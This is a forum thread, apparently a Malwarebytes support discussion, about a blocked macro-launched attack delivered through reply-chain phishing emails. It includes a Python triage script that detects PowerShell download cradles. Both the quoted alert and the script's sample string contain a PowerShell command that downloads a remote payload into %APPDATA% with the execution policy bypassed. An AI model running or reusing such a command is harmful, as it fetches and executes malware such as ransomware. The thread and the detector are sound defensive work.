
AE alert- i have questions


We have gotten AE alerts before. Usually harmless. However, this morning multiple malicious emails came into the organization, all from the same sender, and 2 users opened the attachment (Word doc). I received the alert below:

8/31/2017 7:00:09 AM    Computer18         Exploit payload process blocked                BLOCK                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http:\*******************.com\okas\kunkd.dat', $env:APPDATA + '\pP...


Computer name and URL changed.


It looks like the Word doc likely had a macro that triggered this, but here is the weird thing (and maybe it isn't weird and I just haven't seen it yet). The users here who received emails all received a different email (with the bad file attached) that was a reply to a previous email conversation. I've not seen that before. The body of each email was the same but was phrased in a way that fooled multiple users, due to language that is pretty spot on for our industry.


Can anyone tell me what this is that was blocked, and if the particular detail of the email being a reply to a previous email is new?

Malwarebytes Anti-Exploit.zip
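For anyone triaging an alert like the one above, here is a small added example (not Malwarebytes' code and not from the poster) that parses an Anti-Exploit alert line and flags the download-cradle traits visible in the blocked command line: the no-profile switch, the execution-policy bypass, a WebClient download, a drop into %APPDATA%, and a remote URL. The sample lines are constructed for this example; the hostname, URL and dropped file name are placeholders, not the original values, and the indicator regexes are this example's own heuristics rather than any vendor rule set.

```python
import re
from dataclasses import dataclass, field

# Heuristic indicators of a PowerShell download cradle launched from an Office
# macro. These patterns are an assumption of this example, not a vendor rule set.
INDICATORS = {
    "no_profile": re.compile(r"(?i)(?<![\w-])-no(?:p|profile)\b"),
    "bypass_execution_policy": re.compile(r"(?i)-(?:ep|exec|executionpolicy)\s+bypass"),
    "webclient_download": re.compile(r"(?i)System\.Net\.WebClient\)?\.Download(?:File|String)"),
    "appdata_drop": re.compile(r"(?i)\$env:APPDATA"),
    "remote_http_url": re.compile(r"(?i)https?:[\\/]+[^'\"\s]+"),
}

# Constructed sample alert modelled on the forum post's line. Hostname, URL and
# the dropped file name are placeholders.
SAMPLE_ALERT = (
    r"8/31/2017 7:00:09 AM    Computer18         Exploit payload process blocked"
    r"                BLOCK                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -Exec Bypass -Command "
    r"(New-Object System.Net.WebClient).DownloadFile('http:\masked.example.invalid\okas\kunkd.dat', "
    r"$env:APPDATA + '\dropped.dat')"
)

# Constructed benign line: an administrator running a local script.
SAMPLE_BENIGN = (
    r"8/31/2017 7:05:00 AM    Computer18         Process start logged"
    r"                ALLOW                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File C:\Scripts\inventory.ps1"
)


@dataclass
class AlertRecord:
    timestamp: str
    host: str
    event: str
    action: str
    command_line: str
    indicators: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        # A cradle needs a remote fetch plus at least one "run quietly" trait;
        # that two-hit threshold is this example's choice.
        if "webclient_download" in self.indicators and len(self.indicators) >= 2:
            return "download-cradle"
        if self.indicators:
            return "suspicious"
        return "benign"


def parse_alert(line: str) -> AlertRecord:
    # Columns in the alert are separated by runs of two or more spaces; the
    # command line is the single-spaced remainder, so split at most four times.
    parts = re.split(r"\s{2,}", line.strip(), maxsplit=4)
    if len(parts) != 5:
        raise ValueError(f"unexpected alert format: {line!r}")
    ts, host, event, action, cmd = parts
    rec = AlertRecord(ts, host, event, action, cmd)
    rec.indicators = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    return rec


def triage(lines):
    """Parse every alert line and attach indicator hits and a verdict."""
    return [parse_alert(line) for line in lines]


if __name__ == "__main__":
    for rec in triage([SAMPLE_ALERT, SAMPLE_BENIGN]):
        print(f"{rec.timestamp} {rec.host} {rec.action}: {rec.verdict} {rec.indicators}")
```

The output for the first line is the point of the exercise: every indicator fires and the verdict is "download-cradle", which matches Pedro's reading that the block stopped the stage-two download before anything ran. Feeding the same function your own exported alert lines gives a quick way to sort the harmless AE noise from the ones worth escalating.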


That's one of the tactics the latest ransomware malspam campaigns are using. That's a legit block of an attack. It was blocked before the PowerShell payload could even run (and before the ransomware could even be downloaded onto the endpoints).


Thanks, Pedro. I have to say, no amount of user training is going to beat this. It was shockingly good. We're going to have to continue improving protections. If this becomes the norm, it's a whole new ball game. Absolutely none of the typical signs of it being false.
